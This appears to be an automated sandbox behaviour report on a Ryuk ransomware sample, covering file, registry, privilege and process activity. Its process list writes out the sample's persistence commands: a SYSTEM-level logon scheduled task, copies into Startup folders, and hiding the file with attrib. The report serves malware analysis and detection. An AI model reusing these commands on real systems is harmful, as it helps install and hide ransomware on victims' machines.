File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1652 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 3884 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3884 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 620 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 620 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4360 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4360 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4184 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4184 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4268 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4268 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2412 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 716 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 716 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1652 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1832 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1652 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4936 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2264 wrote to memory of 3772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2264 wrote to memory of 3772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1652 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1164 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

